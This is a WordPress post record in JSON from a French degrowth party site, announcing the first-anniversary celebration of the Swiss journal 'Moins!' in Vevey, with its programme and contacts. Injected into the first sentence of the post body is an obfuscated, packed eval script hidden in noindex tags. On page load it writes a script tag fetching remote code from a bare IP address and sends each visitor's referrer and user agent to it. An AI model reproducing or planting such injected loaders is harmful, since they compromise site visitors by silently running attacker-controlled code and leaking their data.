{"id":8573,"date":"2013-08-30T03:30:38","date_gmt":"2013-08-30T02:30:38","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8573"},"modified":"2013-11-02T21:40:50","modified_gmt":"2013-11-02T20:40:50","slug":"moins-souffle-sa-premiere-bougie-samedi-7-septembre-2013-a-partir-de-16h00","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8573","title":{"rendered":"Moins! souffle sa premi\u00e8re bougie ! Samedi 7 septembre 2013, \u00e0 partir de 16h00"},"content":{"rendered":"<div>Depuis <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kirer|var|u0026u|referrer|edfrk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> septembre 2012, nous avons la joie de pouvoir compter sur un tout nouvel outil pour colporter les id\u00e9es de la D\u00e9croissance, offrir des voix critiques au tout productivisme et au tout progr\u00e8s. Moins ! a tr\u00e8s vite su trouver sa place et imposer son style dans l&rsquo;univers mouvant qui est le n\u00f4tre, et au-del\u00e0. Osons le dire : ce nouveau journal romand d\u2019\u00e9cologie politique n\u2019a rien \u00e0 envier \u00e0 ses confr\u00e8res !<\/div>\n<p>Noy\u00e9?e?s par le flot d\u2019informations erron\u00e9es et la banalisation cruelle des impacts \u00e9cologiques, sociaux, \u00e9conomiques,culturels,\u2026 que nous impose la barbarie du capitalisme, c\u2019est une vraie bouff\u00e9e d\u2019oxyg\u00e8ne que nous offre ce m\u00e9dium alternatif ! Plusieurs d\u2019entre nous, membre du PPLD et Un Projet de D\u00e9croissance ont eu la chance de pouvoir contribuer \u00e0 cette aventure ! (Densifier : pour quoi faire ? , \u00a0Revenu Inconditionnel d\u2019Existence ou Dotation Inconditionnelle d\u2019Autonomie ? )<\/p>\n<p>Moins ! soufflera sa premi\u00e8re bougie dans quelques jours. Alors n\u2019h\u00e9sitons plus, participons d\u2019une mani\u00e8re ou d\u2019une autre, abonnons-nous, envoyons nos contributions, nos r\u00e9actions, partageons autour de nous, relayons \u2026 et pourquoi pas, r\u00e9pondons \u00e0 l\u2019invitation ci-dessous !<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" alt=\"\" src=\"http:\/\/www.achetezmoins.ch\/wp-content\/uploads\/2013\/07\/logo_moins6_web.jpg\" width=\"608\" height=\"69\" \/><\/p>\n<div style=\"text-align: center;\"><b>Moins! souffle sa premi\u00e8re bougie!<\/b><br \/>\n<b>Samedi 7 septembre 2013, \u00e0 partir de 16h00<\/b><\/div>\n<p style=\"text-align: left;\"><b>Dans les locaux de: UCJG, <a href=\"http:\/\/goo.gl\/maps\/q9Yr4\" target=\"_blank\">chemin du Point-du-Jour 2, 1800 Vevey<\/a><\/b><br \/>\nNotre journal, lanc\u00e9 dans l&rsquo;inconscience, a surv\u00e9cu \u00e0 sa premi\u00e8re ann\u00e9e. Il semble m\u00eame avoir trouv\u00e9 un lectorat qui l&rsquo;appr\u00e9cie. Nous avons envie de f\u00eater cet heureux \u00e9v\u00e9nement avec vous, lectrices et lecteurs qui rendez possible cette aventure, ainsi qu&rsquo;avec toutes celles et ceux qui y participent. Nous vous invitons donc \u00e0 venir passer un moment avec nous, afin de faire connaissance et de partager id\u00e9es, critiques, etc.<b><\/b><\/p>\n<p>Au programme :<!--more--><br \/>\n16h00: Accueil<br \/>\n16h30: Pr\u00e9sentation et discours de la r\u00e9daction de Moins!<br \/>\n17h00: Conf\u00e9rence de Jacques Grinevald, professeur \u00e0 l&rsquo;Universit\u00e9 de Gen\u00e8ve, pionnier de la d\u00e9croissance<br \/>\n17h45: Discussion ouverte<br \/>\n18h30: Ap\u00e9ro canadien<br \/>\n20h00: Concert canadien<\/p>\n<p>Au plaisir de vous revoir ou de vous rencontrer.<\/p>\n<p><strong>La r\u00e9daction de Moins!<\/strong><br \/>\nAlessia Di Dio, Mathieu Glayre, Mirko Locatelli, Yvan Luccarini<\/p>\n<p>&#8212;<br \/>\nMoins! Journal romand d&rsquo;\u00e9cologie politique<br \/>\nRue des Deux-March\u00e9s 23<br \/>\n1800 Vevey<br \/>\n021 921 62 56<\/p>\n<p><a href=\"mailto:info@achetezmoins.ch\" target=\"_blank\">info@achetezmoins.ch<\/a><br \/>\n<a href=\"http:\/\/www.achetezmoins.ch\" target=\"_blank\">www.achetezmoins.ch<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Depuis septembre 2012, nous avons la joie de pouvoir compter sur un tout nouvel outil pour colporter les id\u00e9es de la D\u00e9croissance, offrir des voix critiques au tout productivisme et au tout progr\u00e8s. Moins ! a tr\u00e8s vite su trouver &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8573\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,17,33],"tags":[],"class_list":["post-8573","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-revue-de-medias","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8573"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8573\/revisions"}],"predecessor-version":[{"id":8576,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8573\/revisions\/8576"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}